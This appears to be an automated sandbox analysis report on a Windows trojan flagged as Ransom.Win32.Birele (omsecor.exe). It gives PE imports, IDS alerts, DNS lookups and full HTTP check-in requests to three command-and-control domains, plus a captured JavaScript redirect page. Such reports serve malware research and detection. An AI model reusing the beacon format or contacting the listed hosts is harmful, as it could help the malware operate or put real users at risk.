IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xf6a8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xe000	0x1b4	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xcc18	0xce00	7d17b3af3ad18f4a94d7ab9fe07eac18	False	0.5967650182038835	data	6.6299319364593226	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xe000	0x2144	0x2200	74f4ab6d225e1f74a6f3100bfbf96df3	False	0.4476102941176471	data	4.463727229154835	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x11000	0x1712c	0x200	9159e4683d74ea27f29c3b096294f663	False	0.466796875	data	3.7016590486098133	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
WININET.dll	HttpSendRequestW, InternetConnectW, HttpOpenRequestW, InternetSetPerSiteCookieDecisionW, InternetOpenUrlW, InternetAttemptConnect, InternetOpenW, InternetReadFile, InternetClearAllPerSiteCookieDecisions, InternetCloseHandle, InternetQueryDataAvailable, InternetSetOptionW
SHLWAPI.dll	StrStrIW, PathMatchSpecW, PathCombineW, wvnsprintfW, StrStrIA, PathRemoveFileSpecW
KERNEL32.dll	TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, GetVersionExA, HeapReAlloc, RtlUnwind, WideCharToMultiByte, MultiByteToWideChar, HeapCreate, CopyFileW, CreateThread, WaitForMultipleObjects, GetTickCount, DeleteFileW, CreateProcessW, SetUnhandledExceptionFilter, ExitProcess, GetLastError, LoadLibraryW, GetProcAddress, Sleep, VirtualProtect, GetPrivateProfileIntW, ExpandEnvironmentStringsW, GetPrivateProfileStringW, FindFirstFileW, SetFilePointer, SetEndOfFile, GetVersionExW, HeapAlloc, SetWaitableTimer, SystemTimeToFileTime, CreateWaitableTimerW, FindNextFileW, HeapFree, ReadFile, GetModuleFileNameW, GetFileTime, WaitForSingleObject, GetTimeZoneInformation, CreateFileW, CloseHandle, GetFileSizeEx, VirtualFree, GetProcessHeap, GetCurrentDirectoryW, VirtualAlloc, VirtualQuery, GetSystemTime, GetFileSize, FindClose, WriteFile, GetLocalTime, GetModuleHandleW, GetCommandLineW
USER32.dll	GetWindowLongW, DispatchMessageW, GetForegroundWindow, CharLowerW, CreateWindowExW, FindWindowW, PeekMessageW, SetForegroundWindow, GetSystemMetrics, MessageBoxW, SetWindowPos, SetWindowLongW, SetParent
ADVAPI32.dll	RegOpenKeyExW, RegEnumKeyExW, RegQueryValueExW, RegSetValueExW, RegCreateKeyExW, RegCloseKey
SHELL32.dll	SHGetFolderPathW
ole32.dll	CoCreateInstance, OleInitialize, CoInitialize
OLEAUT32.dll	SysFreeString, VariantInit, SysAllocString, VariantClear

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
34.41.229.245192.168.2.780497092037771 01/23/24-13:39:19.732410	TCP	2037771	ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst	80	49709	34.41.229.245	192.168.2.7
192.168.2.734.41.229.24549709802015786 01/23/24-13:39:19.422200	TCP	2015786	ET TROJAN Ransom.Win32.Birele.gsg Checkin	49709	80	192.168.2.7	34.41.229.245
192.168.2.7193.166.255.17149699802015786 01/23/24-13:38:35.744468	TCP	2015786	ET TROJAN Ransom.Win32.Birele.gsg Checkin	49699	80	192.168.2.7	193.166.255.171
192.168.2.764.225.91.7349713802015786 01/23/24-13:40:05.584888	TCP	2015786	ET TROJAN Ransom.Win32.Birele.gsg Checkin	49713	80	192.168.2.7	64.225.91.73
192.168.2.764.225.91.7349708802015786 01/23/24-13:39:18.638291	TCP	2015786	ET TROJAN Ransom.Win32.Birele.gsg Checkin	49708	80	192.168.2.7	64.225.91.73

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 23, 2024 13:38:35.521198988 CET	49699	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:38:35.743880987 CET	80	49699	193.166.255.171	192.168.2.7
Jan 23, 2024 13:38:35.744004011 CET	49699	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:38:35.744467974 CET	49699	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:38:35.966620922 CET	80	49699	193.166.255.171	192.168.2.7
Jan 23, 2024 13:38:35.966653109 CET	80	49699	193.166.255.171	192.168.2.7
Jan 23, 2024 13:38:36.080274105 CET	49700	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:38:37.093519926 CET	49700	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:38:39.109201908 CET	49700	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:38:43.109143972 CET	49700	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:38:51.109131098 CET	49700	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:38:57.126569033 CET	49707	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:38:58.140469074 CET	49707	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:39:00.140491962 CET	49707	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:39:04.140392065 CET	49707	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:39:12.140450954 CET	49707	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:39:18.480215073 CET	49708	80	192.168.2.7	64.225.91.73
Jan 23, 2024 13:39:18.637645006 CET	80	49708	64.225.91.73	192.168.2.7
Jan 23, 2024 13:39:18.637798071 CET	49708	80	192.168.2.7	64.225.91.73
Jan 23, 2024 13:39:18.638290882 CET	49708	80	192.168.2.7	64.225.91.73
Jan 23, 2024 13:39:18.795526981 CET	80	49708	64.225.91.73	192.168.2.7
Jan 23, 2024 13:39:18.797132015 CET	80	49708	64.225.91.73	192.168.2.7
Jan 23, 2024 13:39:18.797214031 CET	49708	80	192.168.2.7	64.225.91.73
Jan 23, 2024 13:39:19.096178055 CET	49709	80	192.168.2.7	34.41.229.245
Jan 23, 2024 13:39:19.411546946 CET	80	49709	34.41.229.245	192.168.2.7
Jan 23, 2024 13:39:19.412636995 CET	49709	80	192.168.2.7	34.41.229.245
Jan 23, 2024 13:39:19.422199965 CET	49709	80	192.168.2.7	34.41.229.245
Jan 23, 2024 13:39:19.707097054 CET	80	49709	34.41.229.245	192.168.2.7
Jan 23, 2024 13:39:19.732409954 CET	80	49709	34.41.229.245	192.168.2.7
Jan 23, 2024 13:39:19.732426882 CET	80	49709	34.41.229.245	192.168.2.7
Jan 23, 2024 13:39:19.732510090 CET	49709	80	192.168.2.7	34.41.229.245
Jan 23, 2024 13:39:19.855705976 CET	49709	80	192.168.2.7	34.41.229.245
Jan 23, 2024 13:39:20.095356941 CET	49708	80	192.168.2.7	64.225.91.73
Jan 23, 2024 13:39:20.161643028 CET	80	49709	34.41.229.245	192.168.2.7
Jan 23, 2024 13:39:22.676857948 CET	49710	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:39:23.688195944 CET	49710	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:39:25.687295914 CET	49710	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:39:29.687279940 CET	49710	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:39:37.687366009 CET	49710	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:39:44.240858078 CET	49712	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:39:45.249797106 CET	49712	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:39:47.265419006 CET	49712	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:39:51.265537977 CET	49712	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:39:59.281160116 CET	49712	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:40:05.426767111 CET	49713	80	192.168.2.7	64.225.91.73
Jan 23, 2024 13:40:05.584170103 CET	80	49713	64.225.91.73	192.168.2.7
Jan 23, 2024 13:40:05.584489107 CET	49713	80	192.168.2.7	64.225.91.73
Jan 23, 2024 13:40:05.584887981 CET	49713	80	192.168.2.7	64.225.91.73
Jan 23, 2024 13:40:05.742047071 CET	80	49713	64.225.91.73	192.168.2.7
Jan 23, 2024 13:40:05.743979931 CET	80	49713	64.225.91.73	192.168.2.7
Jan 23, 2024 13:40:05.744055986 CET	49713	80	192.168.2.7	64.225.91.73
Jan 23, 2024 13:40:05.865480900 CET	49714	80	192.168.2.7	34.41.229.245
Jan 23, 2024 13:40:06.874815941 CET	49714	80	192.168.2.7	34.41.229.245
Jan 23, 2024 13:40:07.206876040 CET	80	49714	34.41.229.245	192.168.2.7
Jan 23, 2024 13:40:07.207031965 CET	49714	80	192.168.2.7	34.41.229.245
Jan 23, 2024 13:40:07.207370043 CET	49714	80	192.168.2.7	34.41.229.245
Jan 23, 2024 13:40:10.202997923 CET	49714	80	192.168.2.7	34.41.229.245
Jan 23, 2024 13:40:13.203010082 CET	49714	80	192.168.2.7	34.41.229.245
Jan 23, 2024 13:40:19.204269886 CET	49714	80	192.168.2.7	34.41.229.245
Jan 23, 2024 13:40:31.218717098 CET	49714	80	192.168.2.7	34.41.229.245
Jan 23, 2024 13:40:39.407463074 CET	49714	80	192.168.2.7	34.41.229.245
Jan 23, 2024 13:40:39.519112110 CET	49715	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:40:40.515788078 CET	49715	80	192.168.2.7	193.166.255.171
Jan 23, 2024 13:40:42.515491962 CET	49715	80	192.168.2.7	193.166.255.171

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 23, 2024 13:38:35.330364943 CET	59097	53	192.168.2.7	1.1.1.1
Jan 23, 2024 13:38:35.480412960 CET	53	59097	1.1.1.1	192.168.2.7
Jan 23, 2024 13:39:18.270117998 CET	62557	53	192.168.2.7	1.1.1.1
Jan 23, 2024 13:39:18.478317976 CET	53	62557	1.1.1.1	192.168.2.7
Jan 23, 2024 13:39:18.910788059 CET	51504	53	192.168.2.7	1.1.1.1
Jan 23, 2024 13:39:19.094268084 CET	53	51504	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 23, 2024 13:38:35.330364943 CET	192.168.2.7	1.1.1.1	0xdfbf	Standard query (0)	lousta.net	A (IP address)	IN (0x0001)	false
Jan 23, 2024 13:39:18.270117998 CET	192.168.2.7	1.1.1.1	0x199b	Standard query (0)	mkkuei4kdsz.com	A (IP address)	IN (0x0001)	false
Jan 23, 2024 13:39:18.910788059 CET	192.168.2.7	1.1.1.1	0x2e38	Standard query (0)	ow5dirasuek.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 23, 2024 13:38:35.480412960 CET	1.1.1.1	192.168.2.7	0xdfbf	No error (0)	lousta.net	193.166.255.171	A (IP address)	IN (0x0001)	false
Jan 23, 2024 13:39:18.478317976 CET	1.1.1.1	192.168.2.7	0x199b	No error (0)	mkkuei4kdsz.com	64.225.91.73	A (IP address)	IN (0x0001)	false
Jan 23, 2024 13:39:19.094268084 CET	1.1.1.1	192.168.2.7	0x2e38	No error (0)	ow5dirasuek.com	34.41.229.245	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

lousta.net

mkkuei4kdsz.com

ow5dirasuek.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49699	193.166.255.171	80	1228	C:\Users\user\AppData\Roaming\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Jan 23, 2024 13:38:35.744467974 CET	186	OUT	GET /650/534.html HTTP/1.1 From: 133504871133179231 Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe\|Ad98d3i64ead;d:785id3i55e09<a9858 Host: lousta.net Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49708	64.225.91.73	80	1228	C:\Users\user\AppData\Roaming\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Jan 23, 2024 13:39:18.638290882 CET	191	OUT	GET /470/855.html HTTP/1.1 From: 133504871133179231 Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe\|Ad98d3i64ead;d:785id3i55e09<a9858 Host: mkkuei4kdsz.com Connection: Keep-Alive
Jan 23, 2024 13:39:18.797132015 CET	816	IN	HTTP/1.1 200 OK server: nginx/1.18.0 (Ubuntu) date: Tue, 23 Jan 2024 12:39:18 GMT content-type: text/html content-length: 593 last-modified: Wed, 22 Feb 2023 21:25:52 GMT etag: "63f68860-251" accept-ranges: bytes Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 64 61 74 61 29 0a 20 20 20 20 20 20 20 20 2e 63 61 74 63 68 28 65 72 72 6f 72 20 3d 3e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 69 66 20 28 72 65 74 72 69 65 73 20 3e 20 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 72 69 65 73 2d 2d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 65 74 54 69 6d 65 6f 75 74 28 72 65 74 72 79 2c 20 69 6e 74 65 72 76 61 6c 29 3b 0a 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 45 72 72 6f 72 3a 20 22 2c 20 65 72 72 6f 72 29 3b 0a 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 7d 29 28 29 3b 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49709	34.41.229.245	80	1228	C:\Users\user\AppData\Roaming\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Jan 23, 2024 13:39:19.422199965 CET	190	OUT	GET /92/650.html HTTP/1.1 From: 133504871133179231 Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe\|Ad98d3i64ead;d:785id3i55e09<a9858 Host: ow5dirasuek.com Connection: Keep-Alive
Jan 23, 2024 13:39:19.732409954 CET	415	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Jan 2024 12:39:19 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=b24b739c084d2e122fe89cafcf37ac85\|81.181.57.74\|1706013559\|1706013559\|0\|1\|0; path=/; domain=.ow5dirasuek.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=81.181.57.74; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49713	64.225.91.73	80	7740	C:\Windows\SysWOW64\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Jan 23, 2024 13:40:05.584887981 CET	191	OUT	GET /569/916.html HTTP/1.1 From: 133504915384329881 Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe\|Abe6bgj8345d;83e8d;7::b;6d3i17i24 Host: mkkuei4kdsz.com Connection: Keep-Alive
Jan 23, 2024 13:40:05.743979931 CET	816	IN	HTTP/1.1 200 OK server: nginx/1.18.0 (Ubuntu) date: Tue, 23 Jan 2024 12:40:05 GMT content-type: text/html content-length: 593 last-modified: Wed, 22 Feb 2023 21:25:52 GMT etag: "63f68860-251" accept-ranges: bytes Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 35 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 6e 6f 6a 73 2e 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 6c 65 74 20 72 65 74 72 69 65 73 20 3d 20 33 2c 20 69 6e 74 65 72 76 61 6c 20 3d 20 31 30 30 30 3b 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 20 72 65 74 72 79 28 29 20 7b 0a 20 20 20 20 20 20 66 65 74 63 68 28 22 68 74 74 70 73 3a 2f 2f 64 6f 6d 61 69 6e 63 6e 74 72 6f 6c 2e 63 6f 6d 2f 3f 6f 72 69 67 68 6f 73 74 3d 22 20 2b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 72 65 73 70 6f 6e 73 65 20 3d 3e 20 72 65 73 70 6f 6e 73 65 2e 6a 73 6f 6e 28 29 29 0a 20 20 20 20 20 20 20 20 2e 74 68 65 6e 28 64 61 74 61 20 3d 3e 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 64 61 74 61 29 0a 20 20 20 20 20 20 20 20 2e 63 61 74 63 68 28 65 72 72 6f 72 20 3d 3e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 69 66 20 28 72 65 74 72 69 65 73 20 3e 20 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 72 69 65 73 2d 2d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 65 74 54 69 6d 65 6f 75 74 28 72 65 74 72 79 2c 20 69 6e 74 65 72 76 61 6c 29 3b 0a 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 22 45 72 72 6f 72 3a 20 22 2c 20 65 72 72 6f 72 29 3b 0a 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 7d 29 28 29 3b 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" /></head><body> <script> let retries = 3, interval = 1000; (function retry() { fetch("https://domaincntrol.com/?orighost=" + window.location.href) .then(response => response.json()) .then(data => window.location.href = data) .catch(error => { if (retries > 0) { retries--; setTimeout(retry, interval); } else { console.error("Error: ", error); } }); })(); </script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49714	34.41.229.245	80	7740	C:\Windows\SysWOW64\omsecor.exe

Timestamp	Bytes transferred	Direction	Data
Jan 23, 2024 13:40:07.207370043 CET	298	OUT	GET /580/608.html HTTP/1.1 From: 133504915384329881 Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe\|Abe6bgj8345d;83e8d;7::b;6d3i17i24 Host: ow5dirasuek.com Connection: Keep-Alive Cookie: snkz=81.181.57.74; btst=b24b739c084d2e122fe89cafcf37ac85\|81.181.57.74\|1706013559\|1706013559\|0\|1\|0
Jan 23, 2024 13:40:10.202997923 CET	298	OUT	GET /580/608.html HTTP/1.1 From: 133504915384329881 Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe\|Abe6bgj8345d;83e8d;7::b;6d3i17i24 Host: ow5dirasuek.com Connection: Keep-Alive Cookie: snkz=81.181.57.74; btst=b24b739c084d2e122fe89cafcf37ac85\|81.181.57.74\|1706013559\|1706013559\|0\|1\|0
Jan 23, 2024 13:40:13.203010082 CET	298	OUT	GET /580/608.html HTTP/1.1 From: 133504915384329881 Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe\|Abe6bgj8345d;83e8d;7::b;6d3i17i24 Host: ow5dirasuek.com Connection: Keep-Alive Cookie: snkz=81.181.57.74; btst=b24b739c084d2e122fe89cafcf37ac85\|81.181.57.74\|1706013559\|1706013559\|0\|1\|0
Jan 23, 2024 13:40:19.204269886 CET	298	OUT	GET /580/608.html HTTP/1.1 From: 133504915384329881 Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe\|Abe6bgj8345d;83e8d;7::b;6d3i17i24 Host: ow5dirasuek.com Connection: Keep-Alive Cookie: snkz=81.181.57.74; btst=b24b739c084d2e122fe89cafcf37ac85\|81.181.57.74\|1706013559\|1706013559\|0\|1\|0
Jan 23, 2024 13:40:31.218717098 CET	298	OUT	GET /580/608.html HTTP/1.1 From: 133504915384329881 Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe\|Abe6bgj8345d;83e8d;7::b;6d3i17i24 Host: ow5dirasuek.com Connection: Keep-Alive Cookie: snkz=81.181.57.74; btst=b24b739c084d2e122fe89cafcf37ac85\|81.181.57.74\|1706013559\|1706013559\|0\|1\|0

Target ID:	0
Start time:	13:38:33
Start date:	23/01/2024
Path:	C:\Users\user\Desktop\h.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\h.exe
Imagebase:	0x400000
File size:	83'656 bytes
MD5 hash:	564451E54FA0196ACD2FD7F771E5ED1C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	13:38:33
Start date:	23/01/2024
Path:	C:\Users\user\AppData\Roaming\omsecor.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\omsecor.exe
Imagebase:	0x400000
File size:	83'656 bytes
MD5 hash:	77F1965059059CE58EC10CCA09F566D1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 100%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	14:52:18
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\omsecor.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\omsecor.exe
Imagebase:	0x400000
File size:	83'656 bytes
MD5 hash:	5A37340FA852E5184BBBA4134E60B591
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 100%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Source: http://lousta.net/F.	Avira URL Cloud: Label: malware
Source: http://ow5dirasuek.com/92/650.htmlx;	Avira URL Cloud: Label: malware
Source: http://lousta.net/242/343.html	Avira URL Cloud: Label: malware
Source: http://lousta.net/763/735.htmlr-b	Avira URL Cloud: Label: malware
Source: http://mkkuei4kdsz.com/	Avira URL Cloud: Label: malware
Source: http://ow5dirasuek.com/92/650.html	Avira URL Cloud: Label: malware
Source: http://ow5dirasuek.com/S	Avira URL Cloud: Label: malware
Source: http://ow5dirasuek.com/T	Avira URL Cloud: Label: malware
Source: http://lousta.net/650/534.html	Avira URL Cloud: Label: malware
Source: http://lousta.net/	Avira URL Cloud: Label: malware
Source: http://ow5dirasuek.com/580/608.htmlE	Avira URL Cloud: Label: malware
Source: http://mkkuei4kdsz.com/569/916.html9	Avira URL Cloud: Label: malware
Source: http://mkkuei4kdsz.com/1EF8FD00309293F2C34F3L	Avira URL Cloud: Label: malware
Source: http://lousta.net/763/735.html$	Avira URL Cloud: Label: malware
Source: http://lousta.net/7/91.html	Avira URL Cloud: Label: malware
Source: http://ow5dirasuek.com/580/608.html	Avira URL Cloud: Label: malware
Source: http://lousta.net/876/244.html	Avira URL Cloud: Label: malware
Source: http://ow5dirasuek.com/580/608.html7	Avira URL Cloud: Label: malware
Source: http://ow5dirasuek.com/lousta.net	Avira URL Cloud: Label: malware
Source: http://lousta.net/763/735.html	Avira URL Cloud: Label: malware
Source: http://mkkuei4kdsz.com/569/916.html	Avira URL Cloud: Label: malware
Source: http://ow5dirasuek.com/92/650.htmlws	Avira URL Cloud: Label: malware
Source: http://lousta.net/7/91.htmla	Avira URL Cloud: Label: malware
Source: http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodcon	Avira URL Cloud: Label: malware
Source: http://lousta.net/763/735.htmlZ	Avira URL Cloud: Label: malware
Source: http://lousta.net/650/534.htmlr	Avira URL Cloud: Label: malware
Source: http://ow5dirasuek.com/580/608.htmlg	Avira URL Cloud: Label: malware
Source: http://ow5dirasuek.com/	Avira URL Cloud: Label: malware
Source: http://lousta.net/0	Avira URL Cloud: Label: malware
Source: http://mkkuei4kdsz.com/470/855.html	Avira URL Cloud: Label: malware
Source: http://lousta.net/763/735.htmlhtml	Avira URL Cloud: Label: malware
Source: http://mkkuei4kdsz.com/470/855.html-8a8d424fbe43573ef1HiLMEM	Avira URL Cloud: Label: malware
Source: http://lousta.net/763/735.html_-O	Avira URL Cloud: Label: malware
Source: http://ow5dirasuek.com/92/650.htmll;	Avira URL Cloud: Label: malware
Source: http://ow5dirasuek.com/580/608.htmlm	Avira URL Cloud: Label: malware
Source: http://ow5dirasuek.com/580/608.htmlk	Avira URL Cloud: Label: malware
Source: http://lousta.net/763/735.htmlH	Avira URL Cloud: Label: malware
Source: http://mkkuei4kdsz.com/569/916.html#	Avira URL Cloud: Label: malware

Source: lousta.net	Virustotal: Detection: 12%	Perma Link
Source: mkkuei4kdsz.com	Virustotal: Detection: 12%	Perma Link
Source: ow5dirasuek.com	Virustotal: Detection: 8%	Perma Link
Source: http://mkkuei4kdsz.com/	Virustotal: Detection: 12%	Perma Link
Source: http://ow5dirasuek.com/S	Virustotal: Detection: 8%	Perma Link
Source: http://lousta.net/	Virustotal: Detection: 12%	Perma Link
Source: http://ow5dirasuek.com/T	Virustotal: Detection: 6%	Perma Link
Source: http://lousta.net/650/534.html	Virustotal: Detection: 7%	Perma Link
Source: http://ow5dirasuek.com/92/650.html	Virustotal: Detection: 10%	Perma Link
Source: http://ow5dirasuek.com/580/608.html	Virustotal: Detection: 8%	Perma Link
Source: http://ow5dirasuek.com/lousta.net	Virustotal: Detection: 7%	Perma Link
Source: http://lousta.net/876/244.html	Virustotal: Detection: 14%	Perma Link
Source: http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodcon	Virustotal: Detection: 6%	Perma Link
Source: http://lousta.net/763/735.html	Virustotal: Detection: 8%	Perma Link
Source: http://lousta.net/0	Virustotal: Detection: 14%	Perma Link
Source: http://mkkuei4kdsz.com/470/855.html	Virustotal: Detection: 13%	Perma Link
